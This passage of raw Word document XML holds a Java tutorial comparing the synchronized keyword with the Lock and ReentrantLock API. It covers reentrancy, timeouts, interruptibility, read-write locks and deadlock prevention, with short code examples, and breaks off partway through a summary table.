          <w:ilvl w:val="0"/>
          <w:numId w:val="1264"/>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chronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45254865" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1264"/>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e lock is implicitly tied to the object or class instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425726C7" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1264"/>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Once a thread enters a synchronized block or method, it automatically holds the lock on the object or class until it exits that block/method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24778333" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1264"/>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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F10C61" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1264"/>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A Lock can be explicitly acquired and released. The lock is not automatically released unless the developer explicitly calls unlock().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15749858" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1264"/>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is gives the developer finer control over the lock acquisition and release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350516CD" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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3. Reentrancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F487E1B" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1265"/>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chronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A9E29" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1265"/>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synchronized supports reentrant locking by default. This means that if a thread holds a lock on an object, it can acquire the same lock again without causing a deadlock (i.e., re-enter the synchronized method or block).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07326842" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1265"/>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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D66BE4" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1265"/>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ReentrantLock, which is a commonly used implementation of the Lock interface, also supports reentrancy. It allows the same thread to acquire the lock multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F5E158" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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4. Timeout Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2CCCD" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126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chronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1407BA87" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126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lastRenderedPageBreak/>
        <w:t>synchronized does not provide a built-in way to specify a timeout for acquiring the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078B8FA8" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126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A thread will wait indefinitely if the lock is not available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1012E5DE" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40093437" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126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Lock provides methods like tryLock(long time, TimeUnit unit) which allows a thread to attempt to acquire a lock with a specified timeout. If the lock is not available within the given time, the thread can decide to proceed without acquiring the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C24EF28" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1266"/>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is feature helps avoid situations where threads wait indefinitely for a lock (deadlock avoidance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF7AED0" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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5. Interruptibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFA673D" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>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chronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20574470" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1267"/>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hreads are not interruptible while waiting for a lock in a synchronized block. If a thread is blocked on a synchronized lock, it cannot be interrupted until it acquires the lock or the block finishes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE935C8" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C1233A" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1267"/>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Locks implemented using Lock can be interruptible. For instance, ReentrantLock has a method lockInterruptibly() that allows the thread to be interrupted while waiting to acquire the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037165A7" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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6. Multiple Locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30557BA1" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>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chronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A749FA9" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>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You can only synchronize on a single object (instance or class level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471DFDDF" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>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If you need to synchronize multiple locks, you'll have to manage them separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A127EE" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1585C016" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>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A Lock allows for multiple locks on different resources or objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4726D1AD" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>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You can use multiple locks with the Lock interface, and handle their acquisition and release more explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3746B0D7" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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7. Read-Write Locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFAFD86" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>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chronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DCDA38" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1269"/>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synchronized does not have built-in support for read-write locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC5656" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1269"/>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If multiple threads need to read a resource simultaneously while one thread writes, you have to manage this with additional logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0578D95E" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0837A080" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1269"/>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ReentrantReadWriteLock is a subclass of Lock that provides a more efficient way to handle read and write locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59150E90" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1269"/>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Multiple threads can hold a read lock simultaneously, while only one thread can hold the write lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC8FC5" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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8. Ease of Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038429CC" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>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chronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0044378D" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1270"/>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It is simpler to use, as it is part of the language syntax. No need for explicit lock() or unlock() calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413D7CA" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1270"/>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It's a good choice for simple use cases where you just need to ensure mutual exclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A49BC" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FB81FE" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1270"/>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It provides more flexibility but requires more verbose code. You must manually acquire and release the lock (lock() and unlock()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB6DF29" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1270"/>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It’s better for more complex synchronization scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C2BB1" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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9. Deadlock Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6345129F" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>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synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE8381F" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>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While synchronized can lead to deadlocks (if multiple threads acquire locks in a circular fashion), there is no direct way to detect or prevent deadlocks with synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BDFFB6" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0207CC1A" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>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Lock provides better control over lock management and can be used in conjunction with timeout and interruptible locks, which help prevent deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002DB2E7" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>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Some Lock implementations like ReentrantLock support features like trying to acquire a lock without blocking indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434F6E6" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00000000" w:rsidP="004142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61EDA24">
          <v:rect id="_x0000_i1870" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF0C21F" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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Example Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6553F08F" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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Using synchronized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60407ADC"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public synchronized void myMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B62CC1"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Critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDFB1FD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBC3ADC" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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Using Lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032ADED2"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Lock lock = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB2CA0D"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lastRenderedPageBreak/>
        <w:t>lock.lock();  // Acquiring the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE0B33"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C007007"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 Critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6A7D7"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F1C124"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 xml:space="preserve">    lock.unlock();  // Releasing the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B5A58"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15BAC3" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00000000" w:rsidP="004142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8A35BF0">
          <v:rect id="_x0000_i1871" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AA87AE" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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Summary of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14"/>
        <w:gridCol w:w="2857"/>
        <w:gridCol w:w="3619"/>
      </w:tblGrid>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="0BC798D8" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13240AEF" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68C43BE1" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B3A0466" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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Lock (ReentrantLock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="7F729940" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033F5D81"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Lock Acquisition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F2D8D5"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Implicit, no need to call lock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F753B58"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Explicit, requires lock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="4916E95C" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A6E16DF"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Lock Release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C705523"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Implicit, automatically released</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7ED750"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Explicit, requires unlock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="6C23D538" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F034B56"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Interruptibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C6DDEB6"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E05B5FE"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Yes, via lockInterruptibly()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="6C1733D7" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35B7C09A"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Timeout Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6564A624"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
